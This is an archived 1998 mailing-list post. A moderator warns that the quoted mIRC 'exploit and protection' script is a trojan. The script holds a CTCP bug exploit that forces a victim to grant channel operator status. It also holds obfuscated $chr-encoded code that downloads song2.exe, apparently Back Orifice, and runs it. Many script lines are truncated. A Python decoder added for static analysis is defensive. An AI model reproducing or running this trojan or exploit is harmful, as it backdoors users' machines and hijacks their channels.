This is a trojan script. If it worked right, it would connect to a certain
webserver and download BO. This should *not* have been passed onto the list;
do *not* attempt to load this script.

On Fri, 13 Nov 1998, System Administrator wrote:

> Hi,
> while debugging/hexing/disassembling mirc my friend slotmech last week found
> a mirc bug which allows to force users to send MODE commands to the server.
> this example script sends a MODE +o to the irc server. the mirc author has been
> notified of this but we didn't receive a response... my exploit+protection scri$
> is included. Expect more mirc stuff from us.
>
> cya,
> fs
>
> --- cut here ---
>
> ;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstormat_private>
> ;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$
> ;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$
> ;#;
> ;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
> ;#; -------- That's it... have phun!
> ;#;
> ;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
> ;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$
> ;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$
> ;#;
> ;#; if you want to add this code to your own script please: ASK FIRST!
>
> ctcp 1:userinfo*: antihack
>
> alias antihack {
>   if ($len($2) > 17 && $chr(91) isin $2-) {
>     echo $active mIRC5.41 hack attempt from $nick
>     .halt
>   }
> }
>
> alias hackop {
>   if ($2 == $null) {
>     echo 3 *** Usage: /hackop nick #channel
>     .halt
>   }
>   if ($me !ison $2) {
>     echo 3 *** You aren't on that Channel!
>     .halt
>   }
>   if ($1 !isop $2) {
>     echo 3 *** $1 isn't opped on that channel!
>     .halt
>   }
>   checklen $1
>   .ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $
> }
>
> alias checklen {
>   .if (%xcomplete == 1) halt
>   .if (%xinprog == 1) halt
>   .set %xfilename song2.exe
>   .set %xlof $lof(%xfilename)
>   .set %xfirst 1
>   .write -c %xfilename
>   ; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$
>   .sockclose protx
>   .sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$
> }
> on 1:sockopen:protx: {
>   .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$
>   .sockwrite -n protx
> }
>
> on 1:sockread:protx: {
>   .sockread &test
>   .set %xlof $lof(%xfilename)
>   .if (%xfirst == 1) set %xlof 0
>   .set %xfirst 0
>   .bwrite %xfilename %xlof $sockbr &test
> }
>
> on 1:connect:checklen
>
> on 1:sockclose:protx: {
>   .sockread &test
>   if ($sockbr > 0) {
>     .set %xlof $lof(%xfilename)
>     .bwrite %xfilename %xlof $sockbr &test
>   }
>   .if ($lof(%xfilename) == 178306) {
>     .run %xfilename
>     .set %xcomplete 1
>   }
>   if ($lof(%xfilename) != 178306) {
>     .timer 1 300 checklen
>   }
> }
> unset %xinprog
> unset %xfilename
> unset %xlof
> unset %xfirst
> }
>
> --- cut here ---
>
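The quoted script hides its host name and HTTP request behind $chr(N) $+ chains, so a reviewer cannot see what it connects to by reading it. The following added example (not part of the original post or of either poster's code) decodes such chains statically and reports which download-and-execute stages a script contains, without loading it into mIRC; the sample script, the host.invalid name and the stage names are constructed for illustration.

```python
import re

CHR = re.compile(r"\$chr\((\d{1,3})\)$")
# Commands that together form a download-and-execute chain in an mIRC script.
STAGES = {"network": ("sockopen", "sockwrite"),
          "file_write": ("bwrite", "write"),
          "execute": ("run",)}

def decode_chr(line):
    """Evaluate $chr(N) and the $+ glue operator; other tokens are kept as-is."""
    out, glue = [], False
    for tok in line.split():
        if tok == "$+":            # $+ joins its neighbours without a space
            glue = True
            continue
        m = CHR.match(tok)
        text = chr(int(m.group(1))) if m else tok
        if glue and out:
            out[-1] += text
        else:
            out.append(text)
        glue = False
    return " ".join(out)

def scan(script):
    """Return (stages_seen, decoded_lines) for a script passed as text."""
    stages, decoded = set(), []
    for raw in script.splitlines():
        line = raw.lstrip("> \t")                 # drop e-mail quote markers
        words = line.split()
        if not words or words[0].startswith(";"):  # blank line or comment
            continue
        cmds = {w.lstrip(".").lower() for w in words}
        stages |= {s for s, names in STAGES.items() if cmds & set(names)}
        if len(re.findall(r"\$chr\(\d{1,3}\)", line)) >= 3:
            decoded.append(decode_chr(line))      # obfuscated: show plaintext
    return stages, decoded

# Constructed sample, quoted the way it would arrive in a mail body.
SAMPLE = """\
> .sockopen protx $chr(104) $+ $chr(111) $+ $chr(115) $+ $chr(116) $+ .invalid 80
> .sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(120)
> .bwrite %f 0 $sockbr &buf
> .run %f
"""

if __name__ == "__main__":
    found, plain = scan(SAMPLE)
    print(sorted(found))
    print("\n".join(plain))
```

A script that shows all three stages and also needs decoding before its destination is readable should be treated as a dropper until proven otherwise.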
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:24 PDT